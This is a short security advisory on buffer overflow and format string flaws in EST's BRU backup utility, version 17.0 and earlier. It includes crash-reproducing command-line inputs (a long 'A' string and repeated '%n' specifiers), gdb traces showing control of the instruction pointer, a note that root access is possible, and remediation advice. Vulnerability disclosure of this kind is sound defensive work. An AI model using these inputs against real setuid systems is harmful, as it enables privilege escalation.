|
|
|
|
| |
| EST BRU(TM) Backup and Restore Utility is "the No. 1 award winning product for Linux backup, having won more awards and maintained a larger installed base than any other commercial Linux backup solution. A respected industry veteran, EST has been developing UNIX backup products since 1985". The product has been found to contain buffer overflow and format string vulnerabilities. |
| |
Credit:
The information has been provided by KF.
|
| |
Vulnerable systems:
* BRU version 17.0 and prior
The 2 issues at hand can be reproduced as follows:
elguapo@gentoo elguapo $ /bru/bru `perl -e 'print "A" x 3050'`
bru: [E155] error - memory fault (SIGSEGV)
elguapo@gentoo elguapo $ /bru/bru %n%n%n%n
bru: [E155] error - memory fault (SIGSEGV)
Both issues appear to be caused by poor usage of vsprintf().
Starting program: /bin/bru %n%n%n%n%n
Program received signal SIGSEGV, Segmentation fault.
0x40071d96 in vfprintf () from /lib/libc.so.6
(gdb) bt
#0 0x40071d96 in vfprintf () from /lib/libc.so.6
#1 0x0805543a in step ()
Starting program: /bin/bru `perl -e 'print "A" x 3025'`
Program received signal SIGSEGV, Segmentation fault.
0x08060027 in step ()
(gdb) bt
#0 0x08060027 in step ()
Cannot access memory at address 0x41414141
These issues can easily be exploited by an attacker to gain root access.
Solution:
Upgrade to the Tolisgroup BRU or chmod -s bru.
Vendor status:
The original vendor no longer exists. The Tolisgroup's BRU is not vulnerable by default, customers are requested to upgrade to the latest version.
|
|
|
|
|
